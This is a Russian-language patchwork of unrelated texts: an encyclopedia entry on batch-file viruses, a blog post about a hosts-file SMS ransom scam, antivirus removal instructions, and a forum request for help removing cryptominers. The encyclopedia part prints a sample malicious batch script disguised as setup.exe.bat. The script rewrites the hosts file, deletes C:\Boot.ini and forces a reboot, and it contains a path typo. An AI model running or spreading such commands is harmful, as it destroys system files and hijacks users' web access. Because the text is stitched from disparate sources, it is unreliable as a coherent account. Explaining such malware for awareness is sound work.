Bat вирус
Bat вирус, Batch Malware — вредоносное программное обеспечение, написанное на языке WinBatch. Имеют расширения .bat и .cmd. Чаще всего такие программы пишутся в программах Windows, таких как:
Принцип работы вируса
Обычно вирусы BAT представляют как лицензионную программу, которая якобы является приложением. Расширение .bat в таких случаях не будет видно. Например: файл setup.exe.bat. Иногда бывает, что в архивы WINRar и ZIP вставляют несколько файлов. Ниже приведены примеры атрибутов файлов, которые могут быть в архиве:
- setup.exe.bat — якобы установочная программа.
- autorun.inf — скрытый, системный. Файл поможет запустить другой вредоносный объект.
- debug.exe.cmd — скрытый системный. Файл, который запустит setup.
Файлы BAT автоматически запускаться не могут. Для того, чтобы запустить файл, чаще всего используют файлы autorun.inf. Ниже приведён пример файла debug.exe.cmd:
start setup.exe.bat
@echo off title Setup color a cls echo Please wait. echo 127.0.0.1 wikipedia.org > %windir%\system32\drivers\ect\hosts echo 127.0.0.1 www.wikipedia.org >> %windir%\system32\drivers\etc\hosts cd \ attrib -h -s C:\Boot.ini del C:\Boot.ini shutdown -r
- Компьютерные вирусы
Wikimedia Foundation . 2010 .
Заботливые вирусы
Сегодня любимая обрадовала меня новостью, что и она наконец подхватила вирус, просящий отправить смс. До сих пор думал, что семью ITшника такая штука обойдёт стороной, ан нет — не обошла.
Всё началось с какого-то приложения из вконтакта.
Благо ОС не блокировалась, «вирус» работал просто: блокировал самые популярные сайты, в том числе поисковики, сайты антивирусов и электронной почты. При запросах в окне браузера появлялось 
Естественно, первое, что приходит на ум: «левые» процессы, сегодня уже упомянутые AVZ, HiJackThis. С этим всё оказалось в порядке, но разум дал о себе знать — идём в c:/windows/system32/drivers/etc. Там hosts и hosts.txt. С первым на первый взгляд всё чисто, а во втором я вижу заботу создателя о наших с вами финансах:
127.0.0.1 localhost
#Отправьте смс и не мучайтесь… Реальная стоимость смски 100 рублей, а вызов программиста рублей 500 минимум:)
Так-то. Снова открыв файл hosts я увидел, что это ещё не конец файла, через полсотни символов перевода строки следует длинный список тех самых популярных сайтов: 
Ларчик просто открывался. Непонятно только каким боком здесь Касперский.
Важный UPD: забыл указать, что на самом сайте вконтакте появляется заглушка, на которой указан номер. А стоимость смс не 100, а 250 ру.
Ваша страница заблокирована!
Поскольку с вашего компьютера происходила рассылка спам-сообщений, мы временно ограничили Вам доступ. Подробнее.
Чтобы возобновить полноценный доступ к сайту необходимо подтвердить, что вы являетесь настоящим владельцем данной страницы, для этого отправьте бесплатную смс c текстом 151432 на номер 8353.
В ответном сообщение Вы получите Ваш личный код активации.
Примерно так. Скриншота уже нет.
UPD2: Группу вконтакте (http://vkontakte.ru/club11255695), распространявшую эту пакость, говорят прикрыли.
BAT.Hosts.186
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.
По серийному номеру
На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.
По серийному номеру
- Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
- Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
- загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
- после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
- выключите устройство и включите его в обычном режиме.
Закрыто Помогите в удалении Майнеров и других вирусов!! ��
В общем скачал я gta4 by xattab установил, на компе не было антивируса кроме дефендера, ну того я потушил чтобы не мешал, спустя 20 минут начались дикие фризы, не предал значение, на следующий день решил глянуть в чем проблема, мб драйвера слетели, переустановил на видеокарте, безрезультатно фризы-просад фпс.
Думаю открою процессы и температуру в покое занято было 80% системы и температуры видеокарты 80 градусов. Ошалел сходу побежал качать антивирус, скачивание было ещё той запарой, блок сайтов, блок открытия программы из-за отказанного в доступе прав, думаю приплыл. Получилось поставить антивирус, но профита не дал. Пытался поставить hitman pro не удалось.
Скачал Dr.web cureit. Раза с 10.
Он нашёл много интересных угроз среди которых Bat.hosts.187
Tool.BtcMine2665 2 штуки из разных мест
Trojan.Muldrop самое странное он их не удалять а в действии пишет переместить. Ещё нашёл два процесса ghost.exe в диспетчере пытался их отключить, раза с 5 получилось.
Один процесс realtekHd тоже появился новый. В итоге не знаю что делать.
adwcleaner тоже нашёл сюрпризы которые не видел веб
Помогите пожалуйста